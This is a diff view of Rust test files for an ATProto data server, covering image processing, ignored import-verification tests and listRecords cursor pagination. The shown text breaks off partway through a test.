use bspds::image::{ImageProcessor, ImageError, OutputFormat, THUMB_SIZE_FEED, THUMB_SIZE_FULL, DEFAULT_MAX_FILE_SIZE};
2
+
use image::{DynamicImage, ImageFormat};
3
+
use std::io::Cursor;
4
+
5
+
fn create_test_png(width: u32, height: u32) -> Vec<u8> {
6
+
let img = DynamicImage::new_rgb8(width, height);
7
+
let mut buf = Vec::new();
8
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
9
+
buf
10
+
}
11
+
12
+
fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> {
13
+
let img = DynamicImage::new_rgb8(width, height);
14
+
let mut buf = Vec::new();
15
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap();
16
+
buf
17
+
}
18
+
19
+
fn create_test_gif(width: u32, height: u32) -> Vec<u8> {
20
+
let img = DynamicImage::new_rgb8(width, height);
21
+
let mut buf = Vec::new();
22
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap();
23
+
buf
24
+
}
25
+
26
+
fn create_test_webp(width: u32, height: u32) -> Vec<u8> {
27
+
let img = DynamicImage::new_rgb8(width, height);
28
+
let mut buf = Vec::new();
29
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap();
30
+
buf
31
+
}
32
+
33
+
#[test]
34
+
fn test_process_png() {
35
+
let processor = ImageProcessor::new();
36
+
let data = create_test_png(500, 500);
37
+
let result = processor.process(&data, "image/png").unwrap();
38
+
assert_eq!(result.original.width, 500);
39
+
assert_eq!(result.original.height, 500);
40
+
}
41
+
42
+
#[test]
43
+
fn test_process_jpeg() {
44
+
let processor = ImageProcessor::new();
45
+
let data = create_test_jpeg(400, 300);
46
+
let result = processor.process(&data, "image/jpeg").unwrap();
47
+
assert_eq!(result.original.width, 400);
48
+
assert_eq!(result.original.height, 300);
49
+
}
50
+
51
+
#[test]
52
+
fn test_process_gif() {
53
+
let processor = ImageProcessor::new();
54
+
let data = create_test_gif(200, 200);
55
+
let result = processor.process(&data, "image/gif").unwrap();
56
+
assert_eq!(result.original.width, 200);
57
+
assert_eq!(result.original.height, 200);
58
+
}
59
+
60
+
#[test]
61
+
fn test_process_webp() {
62
+
let processor = ImageProcessor::new();
63
+
let data = create_test_webp(300, 200);
64
+
let result = processor.process(&data, "image/webp").unwrap();
65
+
assert_eq!(result.original.width, 300);
66
+
assert_eq!(result.original.height, 200);
67
+
}
68
+
69
+
#[test]
70
+
fn test_thumbnail_feed_size() {
71
+
let processor = ImageProcessor::new();
72
+
let data = create_test_png(800, 600);
73
+
let result = processor.process(&data, "image/png").unwrap();
74
+
75
+
let thumb = result.thumbnail_feed.expect("Should generate feed thumbnail for large image");
76
+
assert!(thumb.width <= THUMB_SIZE_FEED);
77
+
assert!(thumb.height <= THUMB_SIZE_FEED);
78
+
}
79
+
80
+
#[test]
81
+
fn test_thumbnail_full_size() {
82
+
let processor = ImageProcessor::new();
83
+
let data = create_test_png(2000, 1500);
84
+
let result = processor.process(&data, "image/png").unwrap();
85
+
86
+
let thumb = result.thumbnail_full.expect("Should generate full thumbnail for large image");
87
+
assert!(thumb.width <= THUMB_SIZE_FULL);
88
+
assert!(thumb.height <= THUMB_SIZE_FULL);
89
+
}
90
+
91
+
#[test]
92
+
fn test_no_thumbnail_small_image() {
93
+
let processor = ImageProcessor::new();
94
+
let data = create_test_png(100, 100);
95
+
let result = processor.process(&data, "image/png").unwrap();
96
+
97
+
assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail");
98
+
assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail");
99
+
}
100
+
101
+
#[test]
102
+
fn test_webp_conversion() {
103
+
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
104
+
let data = create_test_png(300, 300);
105
+
let result = processor.process(&data, "image/png").unwrap();
106
+
107
+
assert_eq!(result.original.mime_type, "image/webp");
108
+
}
109
+
110
+
#[test]
111
+
fn test_jpeg_output_format() {
112
+
let processor = ImageProcessor::new().with_output_format(OutputFormat::Jpeg);
113
+
let data = create_test_png(300, 300);
114
+
let result = processor.process(&data, "image/png").unwrap();
115
+
116
+
assert_eq!(result.original.mime_type, "image/jpeg");
117
+
}
118
+
119
+
#[test]
120
+
fn test_png_output_format() {
121
+
let processor = ImageProcessor::new().with_output_format(OutputFormat::Png);
122
+
let data = create_test_jpeg(300, 300);
123
+
let result = processor.process(&data, "image/jpeg").unwrap();
124
+
125
+
assert_eq!(result.original.mime_type, "image/png");
126
+
}
127
+
128
+
#[test]
129
+
fn test_max_dimension_enforced() {
130
+
let processor = ImageProcessor::new().with_max_dimension(1000);
131
+
let data = create_test_png(2000, 2000);
132
+
let result = processor.process(&data, "image/png");
133
+
134
+
assert!(matches!(result, Err(ImageError::TooLarge { .. })));
135
+
if let Err(ImageError::TooLarge { width, height, max_dimension }) = result {
136
+
assert_eq!(width, 2000);
137
+
assert_eq!(height, 2000);
138
+
assert_eq!(max_dimension, 1000);
139
+
}
140
+
}
141
+
142
+
#[test]
143
+
fn test_file_size_limit() {
144
+
let processor = ImageProcessor::new().with_max_file_size(100);
145
+
let data = create_test_png(500, 500);
146
+
let result = processor.process(&data, "image/png");
147
+
148
+
assert!(matches!(result, Err(ImageError::FileTooLarge { .. })));
149
+
if let Err(ImageError::FileTooLarge { size, max_size }) = result {
150
+
assert!(size > 100);
151
+
assert_eq!(max_size, 100);
152
+
}
153
+
}
154
+
155
+
#[test]
156
+
fn test_default_max_file_size() {
157
+
assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024);
158
+
}
159
+
160
+
#[test]
161
+
fn test_unsupported_format_rejected() {
162
+
let processor = ImageProcessor::new();
163
+
let data = b"this is not an image";
164
+
let result = processor.process(data, "application/octet-stream");
165
+
166
+
assert!(matches!(result, Err(ImageError::UnsupportedFormat(_))));
167
+
}
168
+
169
+
#[test]
170
+
fn test_corrupted_image_handling() {
171
+
let processor = ImageProcessor::new();
172
+
let data = b"\x89PNG\r\n\x1a\ncorrupted data here";
173
+
let result = processor.process(data, "image/png");
174
+
175
+
assert!(matches!(result, Err(ImageError::DecodeError(_))));
176
+
}
177
+
178
+
#[test]
179
+
fn test_aspect_ratio_preserved_landscape() {
180
+
let processor = ImageProcessor::new();
181
+
let data = create_test_png(1600, 800);
182
+
let result = processor.process(&data, "image/png").unwrap();
183
+
184
+
let thumb = result.thumbnail_full.expect("Should have thumbnail");
185
+
let original_ratio = 1600.0 / 800.0;
186
+
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
187
+
assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
188
+
}
189
+
190
+
#[test]
191
+
fn test_aspect_ratio_preserved_portrait() {
192
+
let processor = ImageProcessor::new();
193
+
let data = create_test_png(800, 1600);
194
+
let result = processor.process(&data, "image/png").unwrap();
195
+
196
+
let thumb = result.thumbnail_full.expect("Should have thumbnail");
197
+
let original_ratio = 800.0 / 1600.0;
198
+
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
199
+
assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
200
+
}
201
+
202
+
#[test]
203
+
fn test_mime_type_detection_auto() {
204
+
let processor = ImageProcessor::new();
205
+
let data = create_test_png(100, 100);
206
+
let result = processor.process(&data, "application/octet-stream");
207
+
208
+
assert!(result.is_ok(), "Should detect PNG format from data");
209
+
}
210
+
211
+
#[test]
212
+
fn test_is_supported_mime_type() {
213
+
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
214
+
assert!(ImageProcessor::is_supported_mime_type("image/jpg"));
215
+
assert!(ImageProcessor::is_supported_mime_type("image/png"));
216
+
assert!(ImageProcessor::is_supported_mime_type("image/gif"));
217
+
assert!(ImageProcessor::is_supported_mime_type("image/webp"));
218
+
assert!(ImageProcessor::is_supported_mime_type("IMAGE/PNG"));
219
+
assert!(ImageProcessor::is_supported_mime_type("Image/Jpeg"));
220
+
221
+
assert!(!ImageProcessor::is_supported_mime_type("image/bmp"));
222
+
assert!(!ImageProcessor::is_supported_mime_type("image/tiff"));
223
+
assert!(!ImageProcessor::is_supported_mime_type("text/plain"));
224
+
assert!(!ImageProcessor::is_supported_mime_type("application/json"));
225
+
}
226
+
227
+
#[test]
228
+
fn test_strip_exif() {
229
+
let data = create_test_jpeg(100, 100);
230
+
let result = ImageProcessor::strip_exif(&data);
231
+
assert!(result.is_ok());
232
+
let stripped = result.unwrap();
233
+
assert!(!stripped.is_empty());
234
+
}
235
+
236
+
#[test]
237
+
fn test_with_thumbnails_disabled() {
238
+
let processor = ImageProcessor::new().with_thumbnails(false);
239
+
let data = create_test_png(2000, 2000);
240
+
let result = processor.process(&data, "image/png").unwrap();
241
+
242
+
assert!(result.thumbnail_feed.is_none(), "Thumbnails should be disabled");
243
+
assert!(result.thumbnail_full.is_none(), "Thumbnails should be disabled");
244
+
}
245
+
246
+
#[test]
247
+
fn test_builder_chaining() {
248
+
let processor = ImageProcessor::new()
249
+
.with_max_dimension(2048)
250
+
.with_max_file_size(5 * 1024 * 1024)
251
+
.with_output_format(OutputFormat::Jpeg)
252
+
.with_thumbnails(true);
253
+
254
+
let data = create_test_png(500, 500);
255
+
let result = processor.process(&data, "image/png").unwrap();
256
+
assert_eq!(result.original.mime_type, "image/jpeg");
257
+
}
258
+
259
+
#[test]
260
+
fn test_processed_image_fields() {
261
+
let processor = ImageProcessor::new();
262
+
let data = create_test_png(500, 500);
263
+
let result = processor.process(&data, "image/png").unwrap();
264
+
265
+
assert!(!result.original.data.is_empty());
266
+
assert!(!result.original.mime_type.is_empty());
267
+
assert!(result.original.width > 0);
268
+
assert!(result.original.height > 0);
269
+
}
270
+
271
+
#[test]
272
+
fn test_only_feed_thumbnail_for_medium_images() {
273
+
let processor = ImageProcessor::new();
274
+
let data = create_test_png(500, 500);
275
+
let result = processor.process(&data, "image/png").unwrap();
276
+
277
+
assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
278
+
assert!(result.thumbnail_full.is_none(), "Should NOT have full thumbnail for 500px image");
279
+
}
280
+
281
+
#[test]
282
+
fn test_both_thumbnails_for_large_images() {
283
+
let processor = ImageProcessor::new();
284
+
let data = create_test_png(2000, 2000);
285
+
let result = processor.process(&data, "image/png").unwrap();
286
+
287
+
assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
288
+
assert!(result.thumbnail_full.is_some(), "Should have full thumbnail for 2000px image");
289
+
}
290
+
291
+
#[test]
292
+
fn test_exact_threshold_boundary_feed() {
293
+
let processor = ImageProcessor::new();
294
+
295
+
let at_threshold = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED);
296
+
let result = processor.process(&at_threshold, "image/png").unwrap();
297
+
assert!(result.thumbnail_feed.is_none(), "Exact threshold should not generate thumbnail");
298
+
299
+
let above_threshold = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1);
300
+
let result = processor.process(&above_threshold, "image/png").unwrap();
301
+
assert!(result.thumbnail_feed.is_some(), "Above threshold should generate thumbnail");
302
+
}
303
+
304
+
#[test]
305
+
fn test_exact_threshold_boundary_full() {
306
+
let processor = ImageProcessor::new();
307
+
308
+
let at_threshold = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL);
309
+
let result = processor.process(&at_threshold, "image/png").unwrap();
310
+
assert!(result.thumbnail_full.is_none(), "Exact threshold should not generate thumbnail");
311
+
312
+
let above_threshold = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1);
313
+
let result = processor.process(&above_threshold, "image/png").unwrap();
314
+
assert!(result.thumbnail_full.is_some(), "Above threshold should generate thumbnail");
315
+
}
+5
tests/import_with_verification.rs
+5
tests/import_with_verification.rs
···
217
}
218
219
#[tokio::test]
220
async fn test_import_with_valid_signature_and_mock_plc() {
221
let client = client();
222
let (token, did) = create_account_and_login(&client).await;
···
266
}
267
268
#[tokio::test]
269
async fn test_import_with_wrong_signing_key_fails() {
270
let client = client();
271
let (token, did) = create_account_and_login(&client).await;
···
322
}
323
324
#[tokio::test]
325
async fn test_import_with_did_mismatch_fails() {
326
let client = client();
327
let (token, did) = create_account_and_login(&client).await;
···
373
}
374
375
#[tokio::test]
376
async fn test_import_with_plc_resolution_failure() {
377
let client = client();
378
let (token, did) = create_account_and_login(&client).await;
···
424
}
425
426
#[tokio::test]
427
async fn test_import_with_no_signing_key_in_did_doc() {
428
let client = client();
429
let (token, did) = create_account_and_login(&client).await;
···
217
}
218
219
#[tokio::test]
220
+
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_valid_signature_and_mock_plc -- --ignored --test-threads=1"]
221
async fn test_import_with_valid_signature_and_mock_plc() {
222
let client = client();
223
let (token, did) = create_account_and_login(&client).await;
···
267
}
268
269
#[tokio::test]
270
+
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_wrong_signing_key_fails -- --ignored --test-threads=1"]
271
async fn test_import_with_wrong_signing_key_fails() {
272
let client = client();
273
let (token, did) = create_account_and_login(&client).await;
···
324
}
325
326
#[tokio::test]
327
+
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_did_mismatch_fails -- --ignored --test-threads=1"]
328
async fn test_import_with_did_mismatch_fails() {
329
let client = client();
330
let (token, did) = create_account_and_login(&client).await;
···
376
}
377
378
#[tokio::test]
379
+
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_plc_resolution_failure -- --ignored --test-threads=1"]
380
async fn test_import_with_plc_resolution_failure() {
381
let client = client();
382
let (token, did) = create_account_and_login(&client).await;
···
428
}
429
430
#[tokio::test]
431
+
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_no_signing_key_in_did_doc -- --ignored --test-threads=1"]
432
async fn test_import_with_no_signing_key_in_did_doc() {
433
let client = client();
434
let (token, did) = create_account_and_login(&client).await;
+554
tests/list_records_pagination.rs
+554
tests/list_records_pagination.rs
···
···
1
+
mod common;
2
+
mod helpers;
3
+
use common::*;
4
+
use helpers::*;
5
+
6
+
use chrono::Utc;
7
+
use reqwest::StatusCode;
8
+
use serde_json::{Value, json};
9
+
use std::time::Duration;
10
+
11
+
async fn create_post_with_rkey(
12
+
client: &reqwest::Client,
13
+
did: &str,
14
+
jwt: &str,
15
+
rkey: &str,
16
+
text: &str,
17
+
) -> (String, String) {
18
+
let payload = json!({
19
+
"repo": did,
20
+
"collection": "app.bsky.feed.post",
21
+
"rkey": rkey,
22
+
"record": {
23
+
"$type": "app.bsky.feed.post",
24
+
"text": text,
25
+
"createdAt": Utc::now().to_rfc3339()
26
+
}
27
+
});
28
+
29
+
let res = client
30
+
.post(format!(
31
+
"{}/xrpc/com.atproto.repo.putRecord",
32
+
base_url().await
33
+
))
34
+
.bearer_auth(jwt)
35
+
.json(&payload)
36
+
.send()
37
+
.await
38
+
.expect("Failed to create record");
39
+
40
+
assert_eq!(res.status(), StatusCode::OK);
41
+
let body: Value = res.json().await.unwrap();
42
+
(
43
+
body["uri"].as_str().unwrap().to_string(),
44
+
body["cid"].as_str().unwrap().to_string(),
45
+
)
46
+
}
47
+
48
+
#[tokio::test]
49
+
async fn test_list_records_default_order() {
50
+
let client = client();
51
+
let (did, jwt) = setup_new_user("list-default-order").await;
52
+
53
+
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First post").await;
54
+
tokio::time::sleep(Duration::from_millis(50)).await;
55
+
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second post").await;
56
+
tokio::time::sleep(Duration::from_millis(50)).await;
57
+
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third post").await;
58
+
59
+
let res = client
60
+
.get(format!(
61
+
"{}/xrpc/com.atproto.repo.listRecords",
62
+
base_url().await
63
+
))
64
+
.query(&[
65
+
("repo", did.as_str()),
66
+
("collection", "app.bsky.feed.post"),
67
+
])
68
+
.send()
69
+
.await
70
+
.expect("Failed to list records");
71
+
72
+
assert_eq!(res.status(), StatusCode::OK);
73
+
let body: Value = res.json().await.unwrap();
74
+
let records = body["records"].as_array().unwrap();
75
+
76
+
assert_eq!(records.len(), 3);
77
+
let rkeys: Vec<&str> = records
78
+
.iter()
79
+
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
80
+
.collect();
81
+
82
+
assert_eq!(rkeys, vec!["cccc", "bbbb", "aaaa"], "Default order should be DESC (newest first)");
83
+
}
84
+
85
+
#[tokio::test]
86
+
async fn test_list_records_reverse_true() {
87
+
let client = client();
88
+
let (did, jwt) = setup_new_user("list-reverse").await;
89
+
90
+
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First post").await;
91
+
tokio::time::sleep(Duration::from_millis(50)).await;
92
+
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second post").await;
93
+
tokio::time::sleep(Duration::from_millis(50)).await;
94
+
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third post").await;
95
+
96
+
let res = client
97
+
.get(format!(
98
+
"{}/xrpc/com.atproto.repo.listRecords",
99
+
base_url().await
100
+
))
101
+
.query(&[
102
+
("repo", did.as_str()),
103
+
("collection", "app.bsky.feed.post"),
104
+
("reverse", "true"),
105
+
])
106
+
.send()
107
+
.await
108
+
.expect("Failed to list records");
109
+
110
+
assert_eq!(res.status(), StatusCode::OK);
111
+
let body: Value = res.json().await.unwrap();
112
+
let records = body["records"].as_array().unwrap();
113
+
114
+
let rkeys: Vec<&str> = records
115
+
.iter()
116
+
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
117
+
.collect();
118
+
119
+
assert_eq!(rkeys, vec!["aaaa", "bbbb", "cccc"], "reverse=true should give ASC order (oldest first)");
120
+
}
121
+
122
+
#[tokio::test]
123
+
async fn test_list_records_cursor_pagination() {
124
+
let client = client();
125
+
let (did, jwt) = setup_new_user("list-cursor").await;
126
+
127
+
for i in 0..5 {
128
+
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
129
+
tokio::time::sleep(Duration::from_millis(50)).await;
130
+
}
131
+
132
+
let res = client
133
+
.get(format!(
134
+
"{}/xrpc/com.atproto.repo.listRecords",
135
+
base_url().await
136
+
))
137
+
.query(&[
138
+
("repo", did.as_str()),
139
+
("collection", "app.bsky.feed.post"),
140
+
("limit", "2"),
141
+
])
142
+
.send()
143
+
.await
144
+
.expect("Failed to list records");
145
+
146
+
assert_eq!(res.status(), StatusCode::OK);
147
+
let body: Value = res.json().await.unwrap();
148
+
let records = body["records"].as_array().unwrap();
149
+
assert_eq!(records.len(), 2);
150
+
151
+
let cursor = body["cursor"].as_str().expect("Should have cursor with more records");
152
+
153
+
let res2 = client
154
+
.get(format!(
155
+
"{}/xrpc/com.atproto.repo.listRecords",
156
+
base_url().await
157
+
))
158
+
.query(&[
159
+
("repo", did.as_str()),
160
+
("collection", "app.bsky.feed.post"),
161
+
("limit", "2"),
162
+
("cursor", cursor),
163
+
])
164
+
.send()
165
+
.await
166
+
.expect("Failed to list records with cursor");
167
+
168
+
assert_eq!(res2.status(), StatusCode::OK);
169
+
let body2: Value = res2.json().await.unwrap();
170
+
let records2 = body2["records"].as_array().unwrap();
171
+
assert_eq!(records2.len(), 2);
172
+
173
+
let all_uris: Vec<&str> = records
174
+
.iter()
175
+
.chain(records2.iter())
176
+
.map(|r| r["uri"].as_str().unwrap())
177
+
.collect();
178
+
let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect();
179
+
assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records");
180
+
}
181
+
182
+
#[tokio::test]
183
+
async fn test_list_records_rkey_start() {
184
+
let client = client();
185
+
let (did, jwt) = setup_new_user("list-rkey-start").await;
186
+
187
+
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await;
188
+
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await;
189
+
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await;
190
+
create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await;
191
+
192
+
let res = client
193
+
.get(format!(
194
+
"{}/xrpc/com.atproto.repo.listRecords",
195
+
base_url().await
196
+
))
197
+
.query(&[
198
+
("repo", did.as_str()),
199
+
("collection", "app.bsky.feed.post"),
200
+
("rkeyStart", "bbbb"),
201
+
("reverse", "true"),
202
+
])
203
+
.send()
204
+
.await
205
+
.expect("Failed to list records");
206
+
207
+
assert_eq!(res.status(), StatusCode::OK);
208
+
let body: Value = res.json().await.unwrap();
209
+
let records = body["records"].as_array().unwrap();
210
+
211
+
let rkeys: Vec<&str> = records
212
+
.iter()
213
+
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
214
+
.collect();
215
+
216
+
for rkey in &rkeys {
217
+
assert!(*rkey >= "bbbb", "rkeyStart should filter records >= start");
218
+
}
219
+
}
220
+
221
+
#[tokio::test]
222
+
async fn test_list_records_rkey_end() {
223
+
let client = client();
224
+
let (did, jwt) = setup_new_user("list-rkey-end").await;
225
+
226
+
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await;
227
+
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await;
228
+
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await;
229
+
create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await;
230
+
231
+
let res = client
232
+
.get(format!(
233
+
"{}/xrpc/com.atproto.repo.listRecords",
234
+
base_url().await
235
+
))
236
+
.query(&[
237
+
("repo", did.as_str()),
238
+
("collection", "app.bsky.feed.post"),
239
+
("rkeyEnd", "cccc"),
240
+
("reverse", "true"),
241
+
])
242
+
.send()
243
+
.await
244
+
.expect("Failed to list records");
245
+
246
+
assert_eq!(res.status(), StatusCode::OK);
247
+
let body: Value = res.json().await.unwrap();
248
+
let records = body["records"].as_array().unwrap();
249
+
250
+
let rkeys: Vec<&str> = records
251
+
.iter()
252
+
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
253
+
.collect();
254
+
255
+
for rkey in &rkeys {
256
+
assert!(*rkey <= "cccc", "rkeyEnd should filter records <= end");
257
+
}
258
+
}
259
+
260
+
#[tokio::test]
261
+
async fn test_list_records_rkey_range() {
262
+
let client = client();
263
+
let (did, jwt) = setup_new_user("list-rkey-range").await;
264
+
265
+
create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await;
266
+
create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await;
267
+
create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await;
268
+
create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await;
269
+
create_post_with_rkey(&client, &did, &jwt, "eeee", "Fifth").await;
270
+
271
+
let res = client
272
+
.get(format!(
273
+
"{}/xrpc/com.atproto.repo.listRecords",
274
+
base_url().await
275
+
))
276
+
.query(&[
277
+
("repo", did.as_str()),
278
+
("collection", "app.bsky.feed.post"),
279
+
("rkeyStart", "bbbb"),
280
+
("rkeyEnd", "dddd"),
281
+
("reverse", "true"),
282
+
])
283
+
.send()
284
+
.await
285
+
.expect("Failed to list records");
286
+
287
+
assert_eq!(res.status(), StatusCode::OK);
288
+
let body: Value = res.json().await.unwrap();
289
+
let records = body["records"].as_array().unwrap();
290
+
291
+
let rkeys: Vec<&str> = records
292
+
.iter()
293
+
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
294
+
.collect();
295
+
296
+
for rkey in &rkeys {
297
+
assert!(*rkey >= "bbbb" && *rkey <= "dddd", "Range should be inclusive, got {}", rkey);
298
+
}
299
+
assert!(!rkeys.is_empty(), "Should have at least some records in range");
300
+
}
301
+
302
+
#[tokio::test]
303
+
async fn test_list_records_limit_clamping_max() {
304
+
let client = client();
305
+
let (did, jwt) = setup_new_user("list-limit-max").await;
306
+
307
+
for i in 0..5 {
308
+
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
309
+
}
310
+
311
+
let res = client
312
+
.get(format!(
313
+
"{}/xrpc/com.atproto.repo.listRecords",
314
+
base_url().await
315
+
))
316
+
.query(&[
317
+
("repo", did.as_str()),
318
+
("collection", "app.bsky.feed.post"),
319
+
("limit", "1000"),
320
+
])
321
+
.send()
322
+
.await
323
+
.expect("Failed to list records");
324
+
325
+
assert_eq!(res.status(), StatusCode::OK);
326
+
let body: Value = res.json().await.unwrap();
327
+
let records = body["records"].as_array().unwrap();
328
+
assert!(records.len() <= 100, "Limit should be clamped to max 100");
329
+
}
330
+
331
+
#[tokio::test]
332
+
async fn test_list_records_limit_clamping_min() {
333
+
let client = client();
334
+
let (did, jwt) = setup_new_user("list-limit-min").await;
335
+
336
+
create_post_with_rkey(&client, &did, &jwt, "aaaa", "Post").await;
337
+
338
+
let res = client
339
+
.get(format!(
340
+
"{}/xrpc/com.atproto.repo.listRecords",
341
+
base_url().await
342
+
))
343
+
.query(&[
344
+
("repo", did.as_str()),
345
+
("collection", "app.bsky.feed.post"),
346
+
("limit", "0"),
347
+
])
348
+
.send()
349
+
.await
350
+
.expect("Failed to list records");
351
+
352
+
assert_eq!(res.status(), StatusCode::OK);
353
+
let body: Value = res.json().await.unwrap();
354
+
let records = body["records"].as_array().unwrap();
355
+
assert!(records.len() >= 1, "Limit should be clamped to min 1");
356
+
}
357
+
358
+
#[tokio::test]
359
+
async fn test_list_records_empty_collection() {
360
+
let client = client();
361
+
let (did, _jwt) = setup_new_user("list-empty").await;
362
+
363
+
let res = client
364
+
.get(format!(
365
+
"{}/xrpc/com.atproto.repo.listRecords",
366
+
base_url().await
367
+
))
368
+
.query(&[
369
+
("repo", did.as_str()),
370
+
("collection", "app.bsky.feed.post"),
371
+
])
372
+
.send()
373
+
.await
374
+
.expect("Failed to list records");
375
+
376
+
assert_eq!(res.status(), StatusCode::OK);
377
+
let body: Value = res.json().await.unwrap();
378
+
let records = body["records"].as_array().unwrap();
379
+
assert!(records.is_empty(), "Empty collection should return empty array");
380
+
assert!(body["cursor"].is_null(), "Empty collection should have no cursor");
381
+
}
382
+
383
+
#[tokio::test]
384
+
async fn test_list_records_exact_limit() {
385
+
let client = client();
386
+
let (did, jwt) = setup_new_user("list-exact-limit").await;
387
+
388
+
for i in 0..10 {
389
+
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
390
+
}
391
+
392
+
let res = client
393
+
.get(format!(
394
+
"{}/xrpc/com.atproto.repo.listRecords",
395
+
base_url().await
396
+
))
397
+
.query(&[
398
+
("repo", did.as_str()),
399
+
("collection", "app.bsky.feed.post"),
400
+
("limit", "5"),
401
+
])
402
+
.send()
403
+
.await
404
+
.expect("Failed to list records");
405
+
406
+
assert_eq!(res.status(), StatusCode::OK);
407
+
let body: Value = res.json().await.unwrap();
408
+
let records = body["records"].as_array().unwrap();
409
+
assert_eq!(records.len(), 5, "Should return exactly 5 records when limit=5");
410
+
}
411
+
412
+
#[tokio::test]
413
+
async fn test_list_records_cursor_exhaustion() {
414
+
let client = client();
415
+
let (did, jwt) = setup_new_user("list-cursor-exhaust").await;
416
+
417
+
for i in 0..3 {
418
+
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
419
+
}
420
+
421
+
let res = client
422
+
.get(format!(
423
+
"{}/xrpc/com.atproto.repo.listRecords",
424
+
base_url().await
425
+
))
426
+
.query(&[
427
+
("repo", did.as_str()),
428
+
("collection", "app.bsky.feed.post"),
429
+
("limit", "10"),
430
+
])
431
+
.send()
432
+
.await
433
+
.expect("Failed to list records");
434
+
435
+
assert_eq!(res.status(), StatusCode::OK);
436
+
let body: Value = res.json().await.unwrap();
437
+
let records = body["records"].as_array().unwrap();
438
+
assert_eq!(records.len(), 3);
439
+
}
440
+
441
+
#[tokio::test]
442
+
async fn test_list_records_repo_not_found() {
443
+
let client = client();
444
+
445
+
let res = client
446
+
.get(format!(
447
+
"{}/xrpc/com.atproto.repo.listRecords",
448
+
base_url().await
449
+
))
450
+
.query(&[
451
+
("repo", "did:plc:nonexistent12345"),
452
+
("collection", "app.bsky.feed.post"),
453
+
])
454
+
.send()
455
+
.await
456
+
.expect("Failed to list records");
457
+
458
+
assert_eq!(res.status(), StatusCode::NOT_FOUND);
459
+
}
460
+
461
+
#[tokio::test]
462
+
async fn test_list_records_includes_cid() {
463
+
let client = client();
464
+
let (did, jwt) = setup_new_user("list-includes-cid").await;
465
+
466
+
create_post_with_rkey(&client, &did, &jwt, "test", "Test post").await;
467
+
468
+
let res = client
469
+
.get(format!(
470
+
"{}/xrpc/com.atproto.repo.listRecords",
471
+
base_url().await
472
+
))
473
+
.query(&[
474
+
("repo", did.as_str()),
475
+
("collection", "app.bsky.feed.post"),
476
+
])
477
+
.send()
478
+
.await
479
+
.expect("Failed to list records");
480
+
481
+
assert_eq!(res.status(), StatusCode::OK);
482
+
let body: Value = res.json().await.unwrap();
483
+
let records = body["records"].as_array().unwrap();
484
+
485
+
for record in records {
486
+
assert!(record["uri"].is_string(), "Record should have uri");
487
+
assert!(record["cid"].is_string(), "Record should have cid");
488
+
assert!(record["value"].is_object(), "Record should have value");
489
+
let cid = record["cid"].as_str().unwrap();
490
+
assert!(cid.starts_with("bafy"), "CID should be valid");
491
+
}
492
+
}
493
+
494
+
#[tokio::test]
495
+
async fn test_list_records_cursor_with_reverse() {
496
+
let client = client();
497
+
let (did, jwt) = setup_new_user("list-cursor-reverse").await;
498
+
499
+
for i in 0..5 {
500
+
create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
501
+
}
502
+
503
+
let res = client
504
+
.get(format!(
505
+
"{}/xrpc/com.atproto.repo.listRecords",
506
+
base_url().await
507
+
))
508
+
.query(&[
509
+
("repo", did.as_str()),
510
+
("collection", "app.bsky.feed.post"),
511
+
